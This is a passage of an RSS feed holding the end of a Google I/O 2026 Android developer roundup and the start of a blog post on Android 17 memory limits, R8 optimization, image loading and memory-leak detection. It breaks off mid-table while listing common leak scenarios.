  Last week we announced <a href="https://developer.android.com/googlebook">Googlebook</a>, a high-performance laptop that provides a large-screen canvas for your existing apps. Building with adaptive principles today helps ensure your app will work on Googlebook. Get started by reviewing relevant <a href="https://developer.android.com/design/ui/desktop">design guidance</a> and <a href="https://developer.android.com/docs/quality-guidelines/adaptive-app-quality/experiences/desktop">developer guidelines</a> for desktop experiences. Try out the new Desktop Emulator available in the Android Studio Canary to to test your apps for this form factor today.</div><div><br></div><div class="separator"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtH3cjiXICi8dNCtQTDV9PTyjt4wPQBl1xA9XGKGU6FmqLRuBm9YyH7HNQsydD6H6F2GIPw2TdUsFyeu2xMFUO2Jk36k5QXjuWNdm_VE8AQftq2w2m0RPFyYfyZjTppSOjzuOEpJMzF08t9V0YZr-xI7mu31uvcRItugwvVxPUBouSmOXt1MsqbB1WPC0/w640-h360/image3.png"></div><div><div><i>New Desktop Android Emulator</i></div><h3><strong><span>10: Unified widget development experience with Jetpack Glance</span></strong></h3>
  Android 17 marks a shift toward a single, Compose-based development model for all widgets. By unifying the experience across mobile, Wear OS, and cars through Jetpack Glance, you can soon scale UI components across the ecosystem with a familiar workflow. <br><br>The breakthrough this year is the integration of RemoteCompose. On mobile and cars, it powers high-fidelity animations, while on Wear OS, it allows Wear Widgets (formerly Tiles) to render complex UI logic natively on remote surfaces. This ensures peak performance on low-power hardware while allowing a cohesive user journey—like checking a flight status on your car dashboard and seeing gate change updates on your wrist.</div><div><br></div><div><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiA5s4g4hCW89qdeC2oqrTtxh6q7t9q3-wkOSt3tfVzCT3vhLUd1GMYJrhCjK04O2jyxBGl0R2pclnRq3Kb0f0Td-hV9aukKvZQTfGpGJS6GLK0MqUkpVW_0qiNC1eMGe6NPPhlCHrnQWFYhmbdSzpDnUHh5tjvpmUzZOvY2w_dX1LBnpNctSRmeahXUl4/w640-h320/blog_widgets.gif"></div><div><i>Four widgets are shown cycling through in the Android Auto interface. A clock, a contact card, Google Home favorites and a photo.</i></div><div><i><br></i></div><div><strong><span>11: Expand your reach on the road with Android for Cars</span></strong><br>To help you expand your reach when you build in-car experiences, we're making it easier to build once and deliver your apps to Android Auto and Android Automotive OS. With the latest releases of the Car App Library, you can build customized, distraction-optimized <a href="https://developer.android.com/training/cars/apps/media">templated media apps</a> for both platforms. We're introducing new <a href="https://developer.android.com/design/ui/cars/guides/components/overview">components</a> and template capabilities to give you increased flexibility and more options for laying out content. Parked experiences are expanding too, with immersive video playback coming to Android Auto for phones running Android 17. You can easily adapt your video apps for these parked experiences; <a href="https://docs.google.com/forms/d/e/1FAIpQLSf0z4Nfw8wrloVhlgHDpLgdkg4WXsFj9ni5c1pw0qTvJ3Q4fQ/viewform">apply now to the early access program</a> to publish in these beta categories and learn more about the latest updates in our <a href="http://android-developers.googleblog.com/2026/05/android-for-cars-unifying-platforms-premium-experiences.html">blog</a>.<h3><strong><span>12: Accelerate your development with Android XR Developer Preview 4</span></strong></h3>Inspired by the innovative experiences you’ve built for the platform, we’re continuing to mature our tools with <a href="https://goo.gle/XRSDK_IO26">Developer Preview 4 of the Android XR SDK</a>. A key milestone in this journey is the transition of our core libraries, XR Runtime, Jetpack SceneCore, and ARCore for Jetpack XR, moving to Beta soon to provide a more stable and performant foundation. We are also accelerating hardware access through the <a href="https://goo.gle/Catalyst_IO26">Android XR Developer Catalyst Program</a>, where you can apply for XREAL’s Project Aura, audio glasses, or display glasses developer kits. Watch The latest in Android XR session or <a href="https://goo.gle/XRSDK_IO26">read our blog</a> to see how these updates help you build experiences across the ecosystem.</div><div><br><div class="separator"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyjbgGH7RwGkOkQLoXeLd88Vo7cXRjHLBSRokBWkzvYQUrqqbfrTXukM1u_SuGq0-AoXRPoGABpCOF-HMad4-aoNvXjTVyNXgGpbffTlSQMbTaXJva1c2GiUBx1fhC4fCCd0XO9XFzKNzs6edNqo0RAx-p2ZNXy0l-StJh7AxhyphenhyphenrXi-lqe-jXL0n8oprs/w640-h360/Aura%20Geospatial%20Tour%20Demo%20-%20Draft%2001%20(1).gif"></div><i><div><i>Early preview of the Geospatial API  in ARCore for Jetpack XR, enabling high-precision anchoring of digital content to real-world locations.</i></div></i><h3><strong><span>13: Android is your new home for professional-grade media experiences</span></strong></h3>
  Android 17 streamlines the entire media lifecycle with a production-ready toolkit. High-fidelity capture is now simplified with the CameraXViewfinder Composable, which handles complex scaling and responsiveness on foldables and tablets. For post-production, the new Media3 AI Effects library provides a single interface for premium features like Magic Eraser and Studio Sound, automatically optimizing for the device's hardware. <br><br>The pipeline is completed by CodecDB, offering chipset-specific encoding recommendations to eliminate export noise, and a new Scrubbing Mode in ExoPlayer for ultra-smooth seeking. Whether you’re compositing multi-asset edits with Media3 Transformer or using the streamlined CastPlayer API, these updates ensure a professional-grade experience with significantly less development overhead.</div><div><br><div class="separator"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXXvjrWhhRUXdYJyhuu-Vnf0UP2jKcYhAvUggZJi10kndrixZdx4cD8HEhrWVmavlxAUT5N025Fx1kgOLJP5w83LDUSR3E9YzfIJUuZ3WBedFSBtI_oLgIcxSOYg-s53obwX_8HtYqfxSaz95LVzSiMAdrrwgL4T6TVETwtxxkZV2mSkkAfvYA681zNlc/w640-h542/supercharge%20(1).gif"></div><div class="separator"><i>Low Light Boost and Magic Eraser in action</i></div><h3><strong><span>14: Increase app discovery and engagement on Google TV</span></strong></h3>
  Pointer remotes, which enable motion-controlled input, will be a future way for users to interact with Google TV as it unlocks faster user navigation. App developers can start <a href="https://developer.android.com/training/tv/get-started/hardware#no-touchscreen">declaring support for pointing input</a> to ensure their apps are discoverable on future TVs with pointer remotes. Additionally, the Engage SDK, formerly known as the Video Discovery API, optimizes Resumption, Entitlements, and Recommendations across all Google TV form factors to boost app discovery and engagement. It’s a great time to start onboarding the Engage SDK now, since the legacy Watch Next API, which has been powering your continue watching 1.0 experience, will lose support in the 2nd half of 2027. Get all the details in our <a href="http://android-developers.googleblog.com/2026/05/increase-google-tv-app-discovery.html">blog</a>.</div><div><h3><strong><span>15: Performance: the foundation of a great app experience</span></strong></h3>To help developers navigate memory limits in Android 17, we've launched a suite of optimization tools. The <a href="https://developer.android.com/r8-analyzer">R8 Configuration Analyzer</a> identifies keep rules that are bloating your binary, while <a href="https://developer.android.com/topic/performance/tracing/profiling-manager/how-to-capture">ProfilingManager</a> and the integrated LeakCanary in Android Studio streamline memory leak detection. Furthermore, the new <a href="https://developer.android.com/android-performance-analyzer">Android Performance Analyzer</a> offers advanced AI integration for complex trace analysis and automated SQL query generation to pinpoint performance bottlenecks.     <h2><strong><span>And The Latest on Driving Business Growth </span></strong></h2>

  <h3><strong><span>16: What’s new in Google Play</span></strong></h3>Today's <a href="https://goo.gle/play-io26">updates from Google Play</a> help expand your reach and scale your business with less complexity. We’re redefining Play Store discovery with an immersive, short-form video format called Play Shorts, while expanding your audience beyond the store with app discovery in the Gemini app on Android and web. Plus, we’re introducing powerful new capabilities like agentic catalog management for seamless bulk price and SKU updates, and using Gemini models to enable Play Console  to pre-populate store listings from imported documents—making global localization effortless. </div><div><br><div class="separator"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOB1wGZNYGPgY0ED70X7Dtl2KiFk8kRH4fv3HrXXTWX0-xKkN4Em0mi8QAB0g2w_-4SNcTR4fJazpiQ7XI6-XKeyQniFhULKWNmV8YvyWMuQ9tosvT5ixZ0FOye27DI90R5Tra1eWX3FCX7OrWkgzhvhCD6vtfD8_6-FMfMWDvXoVv3zSTauZwraDGsM4/w640-h360/IO26_BlogInLine_App-discovery-in-Gemini_1920x1080_1605.gif"></div><div><i>Gemini will provide users with app suggestions during a search</i></div>

  <h3><strong><span>17: And of course, Android 17</span></strong></h3>
  Android 17 includes new performance &amp; system architecture improvements (in addition to app memory limits) like a lock-free MessageQueue and a GC with more frequent, less intensive young-generation collections to ensure system-wide stability and smoother UIs. The new <a href="https://developer.android.com/about/versions/17/features/contact-picker">contact picker</a> and <a href="https://developer.android.com/reference/android/content/Intent#ACTION_OPEN_EYE_DROPPER">eyedropper API</a> help minimize the use of sensitive permissions and unnecessary access to user data. <br><br>Review <a href="https://developer.android.com/about/versions/17/behavior-changes-all">the behavior changes</a> to make sure your app is ready for Android 17, including <a href="https://developer.android.com/about/versions/17/behavior-changes-all#bg-audio">background audio hardening</a> and <a href="https://developer.android.com/about/versions/17/behavior-changes-all#sms-otp-all-apps">SMS OTP protection</a>. Get ready to <a href="https://developer.android.com/about/versions/17/behavior-changes-17">target Android 17</a> (API 37) with changes such as mandatory large-screen resizability, certificate transparency by default, and restricted local network access. You can start testing today by enrolling your device <a href="https://android-developers.googleblog.com/2026/04/the-fourth-beta-of-android-17.html">in the Beta</a> or using the latest 17.0 emulator images. <br><br>One more thing. the third beta of our Android 17 quarterly platform release (QPR1) just came out, and it contains a minor SDK release to support a few features that just couldn't wait for QPR2.

  <h2><strong><span>Check out all of the Android &amp; Play Content at Google I/O </span></strong></h2>
  <p><span face="sans-serif">This was just a preview of some of the updates for Android developers at Google I/O. Tune into <a href="https://io.google/2026/explore/pa-keynote-5">What’s New in Android</a> for the latest news and announcements and <a href="https://io.google/2026/">follow Google I/O</a> for much more over the following week!</span></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Prioritizing Memory Efficiency: Essential Steps for Android 17]]></title>
<description><![CDATA[Posted by Alice Yuan, Developer Relations Engineer, Ajesh Pai, Developer Relations Engineer, and Fung Lam, Developer Relations Engineer



    
        
    



    While app performance is often equated with a smooth UI and fast start times, memory serves as the silent foundation upon which thes...]]></description>
<link>https://tsecurity.de/de/3693508/android-tipps/prioritizing-memory-efficiency-essential-steps-for-android-17/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693508/android-tipps/prioritizing-memory-efficiency-essential-steps-for-android-17/</guid>
<pubDate>Sat, 25 Jul 2026 10:15:41 +0200</pubDate>
<category>🤖 Android Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCIAoJpwUITPS5C3_eTksMsaslwqPk7SIEQHkwEkGv8572ccdIKcdv6kNC1BOSJPAZTgX5m3liMMv4zdK58e5dWRhUfo39uas23LuhEWf13TFnDTdw-Z5mWn4JarSnC8yCET8Sw15zSF-jQ5zwALriacGK6IjAGxNg61sFtSxzndjvqXxZtJt4qxuzd9A/s2048/Engineering-Memory-Blog-Meta-3.png">

<div class="separator">
    <em>Posted by Alice Yuan, Developer Relations Engineer, Ajesh Pai, Developer Relations Engineer, and Fung Lam, Developer Relations Engineer</em>
</div>

<div class="separator">
    <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhanYZz4QpaDuwP7y_ZVGCUh6TpdQxS65pBcYr-Qkawd9YFS587tnIUPnqDROlxIXzgdz6GGxluR3LzH8ZabQPWz382FDEOEDpK3GxUFywn0A54JXFtUwDPaeI0JnFhEl-6NRrcjKeFPMLozNQv_An9OcWEUA-rmXfOhWvIKRrptdblGEZHERD0P-ynFcc/s4209/Engineering-Memory-Blog-3.png">
        <img border="0" data-original-height="1253" data-original-width="4209" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhanYZz4QpaDuwP7y_ZVGCUh6TpdQxS65pBcYr-Qkawd9YFS587tnIUPnqDROlxIXzgdz6GGxluR3LzH8ZabQPWz382FDEOEDpK3GxUFywn0A54JXFtUwDPaeI0JnFhEl-6NRrcjKeFPMLozNQv_An9OcWEUA-rmXfOhWvIKRrptdblGEZHERD0P-ynFcc/s16000/Engineering-Memory-Blog-3.png">
    </a>
</div>

<p>
    While app performance is often equated with a smooth UI and fast start times, memory serves as the silent foundation upon which these visible metrics are built. It's no secret that we're seeing a shift where device memory is more important than ever. Not only have we made strides in Android memory optimizations with Android 17, we're providing the tooling and API support to help you stay ahead of stricter memory requirements later this year.
</p>

<p>
    To ensure device stability, starting in Android 17, the system will begin enforcing app memory limits based on the device's total RAM. If an app exceeds those limits, Android will kill the process with no associated stack trace.
</p>

<div>
    Beyond these forced terminations, unoptimized memory usage inevitably degrades the user experience. When the app approaches heap memory limits, it triggers frequent garbage collection—leading to noticeable UI stutters. Furthermore, when a device runs out of available memory, the system scrambles to reclaim pages, causing CPU strain, UI latency, and battery drain. If the memory shortage is too severe, it can cause Low Memory Killer (LMK) events that abruptly terminate background processes and force apps to have slow cold starts and lose user state.
</div>

<div>
    <p>To build highly performant apps and avoid these forced terminations, we recommend that you adopt the following memory optimization strategies:</p>
    <ol>
        <li><a href="http://android-developers.googleblog.com/2026/06/prioritizing-memory-efficiency-steps-for-android-17.html#Maximize">Maximize bytecode optimization with R8</a></li>
        <li><a href="http://android-developers.googleblog.com/2026/06/prioritizing-memory-efficiency-steps-for-android-17.html#Optimize">Optimize image loading</a></li>
        <li><a href="http://android-developers.googleblog.com/2026/06/prioritizing-memory-efficiency-steps-for-android-17.html#Detect">Detect and fix memory leaks with Android Studio</a></li>
        <li><a href="http://android-developers.googleblog.com/2026/06/prioritizing-memory-efficiency-steps-for-android-17.html#Trim">Trim memory when app leaves visible state</a></li>
        <li><a href="http://android-developers.googleblog.com/2026/06/prioritizing-memory-efficiency-steps-for-android-17.html#Advanced">Advanced memory observability with ProfilingManager</a></li>
    </ol>
</div>
<br>
<div>
    <div class="separator">
        
    </div>
    <div>
        <em>A condensed version of this blog post is also available in video format, go check it out!</em>
    </div>
    
    <h3>Understanding Android 17 app memory limits</h3>
    <p>App memory limits are being introduced in Android 17 to prevent "one bad actor" from destroying the multitasking experience and stability of the user’s entire device.</p>
    <p>Here is a breakdown of the reasons driving this architectural change:</p>
    
    <div>
        <ul>
            <li><b>Preventing cascading kills:</b> When an app becomes bloated or leaks memory while holding a privileged state (e.g. it’s running a Foreground Service), it is initially shielded from the system's Low Memory Killer (LMK). As this single app grows unchecked and hoards RAM, the LMK is forced to compensate by killing off dozens of smaller, well-behaved cached apps and background jobs to reclaim space for the memory hog.</li>
            <li><b>Preserving multitasking and user state:</b> When the system is forced to purge cached apps to accommodate a single leaking process, the multitasking experience is severely degraded. Users returning to prior cached applications encounter sluggish cold starts instead of near-instant warm resumes. This inefficiency generates more CPU strain and accelerates battery depletion. It can also destroy the user’s context in recently used apps, such as scroll positions, navigation stacks, and in-game progress.</li>
        </ul>
        
        <div>
            <p>To determine if your app session was impacted by these constraints in the field, you can call <a href="https://developer.android.com/reference/android/app/ApplicationExitInfo#getDescription%28%29" target="_blank">getDescription()</a> within <a href="https://developer.android.com/reference/android/app/ApplicationExitInfo" target="_blank">ApplicationExitInfo</a>. If the system applied a limit, the exit reason is reported as <a href="https://developer.android.com/reference/android/app/ApplicationExitInfo#REASON_OTHER" target="_blank">REASON_OTHER</a> and the description string will contain "MemoryLimiter:AnonSwap". You can also leverage <a href="https://developer.android.com/topic/performance/tracing/profiling-manager/trigger-based-capture" target="_blank">trigger-based profiling</a> using <a href="https://developer.android.com/about/versions/17/features#anomaly-profiling-trigger" target="_blank">TRIGGER_TYPE_ANOMALY</a> to automatically capture heap dumps when the memory limit is reached. Furthermore, Android is actively working to surface more in-field memory metrics to developers within the Google Play Console.</p>
            <p>We have also expanded our <a href="https://developer.android.com/about/versions/17/behavior-changes-all#app-memory-limits" target="_blank">memory limits documentation</a> to include local debugging commands, allowing you to simulate memory constraints in your local environment and validate your application's behavior under any memory limit enforcement. </p>
        </div>
    </div>
</div>

<div>
    <h3>Maximize bytecode optimization with R8</h3>
    <p>A highly effective way to reduce your app's memory footprint is to enable the R8 optimizer. By shrinking classes, methods, and fields into shorter names and stripping out unused code and resources, R8 significantly reduces your app's memory footprint by minimizing the amount of resident code required during execution. </p>
    <p>R8 minimizes resident code, shrinking the memory footprint and lowering LMK termination risk. This results in more frequent warm starts over slow cold starts. Additionally, streamlined bytecode reduces main-thread CPU overhead, directly cutting ANR rates for a more fluid user experience. For example, the digital bank <a href="https://developer.android.com/blog/posts/monzo-boosts-performance-metrics-by-up-to-35-with-a-simple-r8-update" target="_blank">Monzo</a> enabled full R8 optimization and saw a 35% reduction in their ANR rate, a 30% improvement in cold start rate, and a 9% reduction in overall app size.</p>
</div>

<div class="separator">
    <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhB61hi7-o6RYAHNOoIg1egyi6iU3iGtLbwfOb-s6r_PadBV2LZzvYtcdD00iwcApjnqmwOssOLFSHv8MG_es8WJWaJUPaO6rMY4ZcINSBFROo_1Di3LVMvIEhPldpzQsUOxV1Z7VfPwvej2fa9a7yCNwBdGOGw2LMLtPrCST6InlqF1xHds30rS76C9no/s2500/pic1-IO26_113_TSV-monzo-casestudy.jpg">
        <img border="0" data-original-height="1406" data-original-width="2500" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhB61hi7-o6RYAHNOoIg1egyi6iU3iGtLbwfOb-s6r_PadBV2LZzvYtcdD00iwcApjnqmwOssOLFSHv8MG_es8WJWaJUPaO6rMY4ZcINSBFROo_1Di3LVMvIEhPldpzQsUOxV1Z7VfPwvej2fa9a7yCNwBdGOGw2LMLtPrCST6InlqF1xHds30rS76C9no/s16000/pic1-IO26_113_TSV-monzo-casestudy.jpg">
    </a>
</div>
<div>
    <i>The digital bank <a href="https://developer.android.com/blog/posts/monzo-boosts-performance-metrics-by-up-to-35-with-a-simple-r8-update" target="_blank">Monzo</a> enabled full R8 optimization and boosted performance metrics by up to 35%.</i>
</div>

<div>
    <p>To properly configure R8 in your <code>build.gradle</code> file:</p>
    <ul>
        <li>Set <code>isShrinkResources = true</code> and <code>isMinifyEnabled = true</code>.</li>
        <li>Use <code>proguard-android-optimize.txt</code> instead of the legacy <code>proguard-android.txt</code>, which actually prevents optimizations and is no longer supported in Android Gradle Plugin 9.</li>
        <li>Remove <code>android.enableR8.fullMode = false</code> from your <code>gradle.properties</code>.</li>
    </ul>
    
    <p>
        If you are using reflection in your code base, then add <a href="https://developer.android.com/topic/performance/app-optimization/keep-rules-overview#where-to-add-rules" target="_blank">Keep rules</a> to prevent R8 from optimizing those parts of the code. Make sure to scope the keep rules narrowly to get the maximum optimization.
    </p>
    <p>To get the maximum optimization, make sure to follow these best practices in your keep rule file.</p>
    
    <ul>
        <li>Remove global options like <code>-dontoptimize</code>, <code>-dontshrink</code>, and <code>-dontobfuscate</code> that prevent R8 from optimizing the entire codebase </li>
        <li>Remove keep rules that prevent optimizing Android components like Activity, Services, Views or Broadcast receivers.</li>
        <li>Refine the broad package wide keep rules to target only specific classes or methods.</li>
    </ul>
    
    <p>To see more best practices, view our <a href="https://developer.android.com/topic/performance/app-optimization/keep-rules-best-practices" target="_blank">keep rules documentation</a>.</p>
    
    <h3>Library Developer R8 Best Practices</h3>
    <p>If you are a library developer, strictly place the rules your consumers need into your <code>consumer-rules</code> file, and keep your library's internal protection rules in your <code>proguard-rules.pro</code> file. For more information on how to optimize libraries, see <a href="https://developer.android.com/topic/performance/app-optimization/library-optimization" target="_blank">Optimization for library authors</a>.</p>
    
    <h3>R8 Configuration Analyzer</h3>
    <p>To audit your R8 optimization, use the <b><a href="http://developer.android.com/r8-analyzer" target="_blank">Configuration Analyzer</a></b>. Configuration analyzer shows the current state of optimization with Obfuscation, Optimization, and Shrinking scores. With configuration analyzer, you can also understand how many classes, methods or fields are prevented from optimization by each keep rule. Refine these broad package wide keep rules to unlock the maximum optimization.</p>
    <p>Using configuration analyzer, you can also identify keep rules that are subsuming other keep rules, redundant keep rules and unused keep rules.</p>
</div>

<div class="separator">
    <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEib0dTmk8w7EYsDiV0Ufd8CAnpWz36-ZDC_gCGFkS_0CGz0axCxOy3RBxuaOoUbR4kzaeFBXryfSR2rkxRsmTXNrPtuJw8n1DTiZiKDqHjv3AaEXteE9TKV3QxYtwCztvY-8a0GpBlOZhVV1p0ftgdxeiKGGnO3dLu_IOt-TB_7j-ZnbR2jSr_CNYzh-bc/s2048/pic2-r8-config-analyzer.png">
        <img border="0" data-original-height="1156" data-original-width="2048" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEib0dTmk8w7EYsDiV0Ufd8CAnpWz36-ZDC_gCGFkS_0CGz0axCxOy3RBxuaOoUbR4kzaeFBXryfSR2rkxRsmTXNrPtuJw8n1DTiZiKDqHjv3AaEXteE9TKV3QxYtwCztvY-8a0GpBlOZhVV1p0ftgdxeiKGGnO3dLu_IOt-TB_7j-ZnbR2jSr_CNYzh-bc/s16000/pic2-r8-config-analyzer.png">
    </a>
</div>
<div>
    <i>The Configuration Analyzer shows the current state of optimization with Obfuscation, Optimization, and Shrinking scores.</i>
</div>

<div>
    <h4><span>R8 Agent Skill </span></h4>
    <p>You can also leverage the <b><a href="https://github.com/android/skills/tree/main/performance/r8-analyzer" target="_blank">R8 Agent Skill</a></b> with Android Studio agent or other AI tools to resolve misconfigurations and refine your rules resulting in improved app performance. <i>(Insights from AI-driven skills will require technical verification)</i></p>
</div>

<h3>Optimize image loading</h3>
<div>
    <p>Bitmaps are usually the largest common objects residing in your app's memory. They represent the final stage of the image loading process where compressed files, like JPEGs or PNGs, are decoded into raw pixel data for display. This means a tiny 100KB compressed image can balloon into several megabytes of RAM because memory consumption is determined by the image's pixel dimensions and color depth. Since bitmap operations are frequently on the critical path to drawing frames, unoptimized images cause severe memory bloat and UI jank.</p>
    <p>Google recommends leveraging image loading libraries <b><a href="https://github.com/coil-kt/coil" target="_blank">Coil</a></b> for Kotlin-first projects, particularly when developing with Jetpack Compose and <b><a href="https://github.com/bumptech/glide" target="_blank">Glide</a></b> for Java-based applications.</p>
    
    <h4><span>Adopt these five best practices</span></h4>
    <ol>
        <li><b>Downsample images:</b> If you’re loading bitmaps manually, avoid loading a massive image into a tiny thumbnail view; use <a href="https://developer.android.com/topic/performance/graphics/load-bitmap" target="_blank">inSampleSize</a> to load a smaller version. Glide and Coil downsamples images by default and you can configure this downsample strategy using <a href="https://bumptech.github.io/glide/javadocs/470/com/bumptech/glide/load/resource/bitmap/DownsampleStrategy.html" target="_blank">DownsampleStrategy</a> and <a href="https://coil-kt.github.io/coil/image_loaders/" target="_blank">ImageLoader</a> respectively.</li>
        <li><b>Cropping:</b> Avoid embedding padding directly into an image file for letterboxing purposes (e.g., creating a transparent border to expand an image dimensions). Rather than baking in these borders, utilize <a href="https://developer.android.com/reference/android/graphics/drawable/InsetDrawable" target="_blank">InsetDrawable</a> or apply padding directly within the View or Composable containing the bitmap.</li>
        <li><b>Config:</b> Balance memory and quality by choosing the right pixel format. Use <code>RGB_565</code> when transparency isn't needed, which uses half the memory of the default <code>ARGB_8888</code> format. In Glide you can configure this by using <a href="https://bumptech.github.io/glide/javadocs/470/com/bumptech/glide/load/DecodeFormat.html" target="_blank">DecodeFormat</a> and in Coil you can use <a href="https://coil-kt.github.io/coil/api/coil-core/coil3.request/-image-request/" target="_blank">bitmapConfig</a> property.</li>
        <li><b>Prioritize vector drawables:</b> For basic geometric assets, leverage <a href="https://developer.android.com/reference/android/graphics/drawable/ShapeDrawable" target="_blank">ShapeDrawable</a> as a lightweight alternative to decoding rasterized bitmaps. By defining these assets once via XML, you ensure they scale seamlessly across all display densities while effectively eliminating resource-driven memory bloat.</li>
        <li><b>Reuse:</b> If your application manages Bitmaps manually then to minimize memory churn, when a bitmap is no longer required, the app should call <code>bitmap.recycle()</code> and immediately discard the Bitmap reference. If you use an image loading library like Glide or Coil, return the bitmap to the library’s managed pool. By providing an existing buffer for future memory needs, the pool effectively avoids the overhead of new allocations.</li>
    </ol>
    
    <p>Check out our documentation on <a href="https://developer.android.com/develop/ui/compose/graphics/images/optimization" target="_blank">Optimizing performance for images</a> to learn more.</p>
    
    <h4><span>Android Studio tooling</span></h4>
    <p>You can also eliminate redundant bitmaps using Android Studio Narwhal 4. Here is how to hunt them down in five simple steps:</p>
    <ol>
        <li>Open the <b>Profiler</b> tab in Android Studio</li>
        <li>Click <b>Heap Dump</b> (or "Analyze Memory Usage") and hit record to take a snapshot of your app’s current memory state.</li>
        <li>Scan the analysis results for the <b>yellow warning triangle</b> ⚠️, which Android Studio uses to flag duplicate bitmaps being stored multiple times. Alternatively, navigate to the profiler header, choose "Filter by:" and pick the "Duplicate Bitmaps" setting.</li>
        <li>Click on any flagged entry to open the <b>Bitmap Preview</b> pane, allowing you to see exactly which image is the repeat offender.</li>
        <li>Use that visual confirmation to track down the redundant loading logic in your code and implement a better caching strategy.</li>
    </ol>
</div>

<div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDJ6djtozFY7DzrGB-EN8ajLVueF9MdLd4mod4jhtO8YwCzU7ObOwQ2w0Bap5A5NHJ7KVnXIRQqhW8cTdcFhMJPw5FIW1WU7D_Mwm-UC9Fsdr-MOn62xijpjKcS0NeUBnO957jmogGEISNQgeZQk3BVvUWK4BknTjLiuK2TbWCqwO3uTLkjkFhLwJre7w/s2379/pic3-IO26_113_TSV%20-dup-bitmaps-cropped.jpg"><img border="0" data-original-height="1162" data-original-width="2379" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDJ6djtozFY7DzrGB-EN8ajLVueF9MdLd4mod4jhtO8YwCzU7ObOwQ2w0Bap5A5NHJ7KVnXIRQqhW8cTdcFhMJPw5FIW1WU7D_Mwm-UC9Fsdr-MOn62xijpjKcS0NeUBnO957jmogGEISNQgeZQk3BVvUWK4BknTjLiuK2TbWCqwO3uTLkjkFhLwJre7w/s16000/pic3-IO26_113_TSV%20-dup-bitmaps-cropped.jpg"></a></div><div class="separator"><i>Look for the yellow warning triangle ⚠️ in heap dumps when using the Android Studio Profiler.</i></div>

<h3>Detect and fix memory leaks with Android Studio</h3>
<p>Memory leaks in Android occur when your code holds onto an object's reference long after its lifecycle has ended. This prevents the Garbage Collector (GC) from reclaiming that memory, eventually leading to sluggish performance or OutOfMemoryError (OOM).</p>
<p>Android Studio Panda 3 features a dedicated <a href="https://square.github.io/leakcanary/" target="_blank">LeakCanary</a> profiler task, allowing developers to analyze real-time memory leaks and map traces within the IDE.</p>
<p>The LeakCanary profiler task in Android Studio actively moves the memory leak analysis from your device to your development machine, resulting in a significant performance boost during the leak analysis phase as compared to on-device leak analysis.</p>

<div class="separator">
    <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKBixtkwy1hzwA6mikjRX_6vBJ9OQ_RCYdF94HUF8kOLYzQoQrPMLh_6h9u6EGeLzgFc8yjxg3_8zlqWIDCvKa1py5gyxDXasl8JLPDHSEgPpzPyYqzcme69rRKtfIlhMtyNRWXutGXNy-4WcefhSTBhqBgobK678fqvNqL5peOz1UD6ouunLaKPmJCw0/s2048/pic4-android-studio-leaks.png">
        <img border="0" data-original-height="975" data-original-width="2048" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKBixtkwy1hzwA6mikjRX_6vBJ9OQ_RCYdF94HUF8kOLYzQoQrPMLh_6h9u6EGeLzgFc8yjxg3_8zlqWIDCvKa1py5gyxDXasl8JLPDHSEgPpzPyYqzcme69rRKtfIlhMtyNRWXutGXNy-4WcefhSTBhqBgobK678fqvNqL5peOz1UD6ouunLaKPmJCw0/s16000/pic4-android-studio-leaks.png">
    </a>
</div>
<div>
    <i>LeakCanary memory leak analysis contextualized with <b>Go to declaration</b> for debugging</i>
</div>

<p>Additionally, the leak analysis is now contextualized within the IDE and fully integrated with your source code, providing features like go to declaration and other helpful code connections that drastically reduce the friction and time required to investigate and fix memory leaks.</p>

<div>
    <h4><span>Examples of common memory leaks </span></h4>
    <p>Memory leaks occur when an object persists in memory beyond its intended lifespan. This typically happens due to:</p>
    <ul>
        <li>Retaining references to Fragments, Activities, or Views that are no longer in use.</li>
        <li>Mismanaging Context references.</li>
        <li>Failing to properly unregister observers, listeners, and receivers.</li>
        <li>Creating static references to objects that are bound to components with shorter lifecycles.</li>
    </ul>
    
    <p>Here are a few example scenarios:</p>
    
    <div align="left" dir="ltr">
        <table>
            <colgroup>
                <col>
                <col>
                <col>
            </colgroup>
            <tbody>
                <tr>
                    <td>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Scenario</span></p>
                    </td>
                    <td>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Compose-based example</span></p>
                    </td>
                    <td>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">View-based example</span></p>
                    </td>
                </tr>
                <tr>
                    <td>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Leaking Context</span></p>
                    </td>
                    <td>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Example:</span><br><span face="'Google Sans',sans-serif">Passing LocalContext.current to a ViewModel</span></p>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Fix:</span><br><span face="'Google Sans',sans-serif">Keep <code>Context</code> dependent logic within the UI layer. For non-UI layers, refactor to use <a href="https://developer.android.com/training/dependency-injection">dependency injection</a> or observe UI state using <a href="https://developer.android.com/kotlin/flow">Kotlin flow</a>.</span></p>
                    </td>
                    <td>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Example:</span><br><span face="'Google Sans',sans-serif">Storing an <code>Activity</code> in a companion object or static variable.</span></p>
